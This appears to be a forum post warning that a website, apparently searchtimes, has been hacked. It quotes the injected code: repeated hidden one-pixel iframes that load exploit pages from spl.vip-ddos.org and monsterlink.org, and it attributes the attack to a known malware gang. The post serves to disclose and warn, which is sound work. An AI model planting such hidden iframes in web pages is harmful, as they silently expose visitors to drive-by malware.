This is nasty. There's a lot of virus code tacked on (hacked on)
CODE
<script language="JavaScript">
</script>
<iframe width="1" height="1" style="visibility: hidden;" src="http://spl.vip-ddos.org/index.php">
</iframe>
<script language="JavaScript">
</script>
<iframe width="1" height="1" style="visibility: hidden;" src="http://spl.vip-ddos.org/index.php">
</iframe>
<script language="JavaScript">
</script>
<iframe width="1" height="1" style="visibility: hidden;" src="http://spl.vip-ddos.org/index.php">
</iframe>
<script language="JavaScript">
</script>
<iframe width="1" height="1" style="visibility: hidden;" src="http://spl.vip-ddos.org/index.php">
</iframe>
<script language="JavaScript">
</script>
<iframe width="1" height="1" style="visibility: hidden;" src="http://spl.vip-ddos.org/index.php">
</iframe>
<script language="JavaScript">
</script>
<iframe width="1" height="1" style="visibility: hidden;" src="http://spl.vip-ddos.org/index.php">
</iframe>
<script language="JavaScript">
</script>
<iframe width="1" height="1" style="visibility: hidden;" src="http://spl.vip-ddos.org/index.php">
</iframe>
<script language="JavaScript">
</script>
<iframe width="1" height="1" style="visibility: hidden;" src="http://spl.vip-ddos.org/index.php">
</iframe>
<script>
</script>
<script>
</script>
<script>
</script>
<script>
</script>
<iframe width="1" height="1" style="visibility: hidden;" src="http://monsterlink.org/spl/index.php">
The letters "spl" in those URLs indicate an exploit/trojan/virus. The letters are hacker shorthand for
exploit as they shorten that word to
sploit quite often.
The best thing I can do is to point you for information to Dancho Danchev's blog where he's already posted on this subject. He assigns this work to The
New Media Malware Gang who are related to the Russian Business Network malware group.
NB. The codes don't appear like that on the page, they are hidden inside professionally encrypted javascript codes.
ETA I sent an email to searchtimes to let them know about this.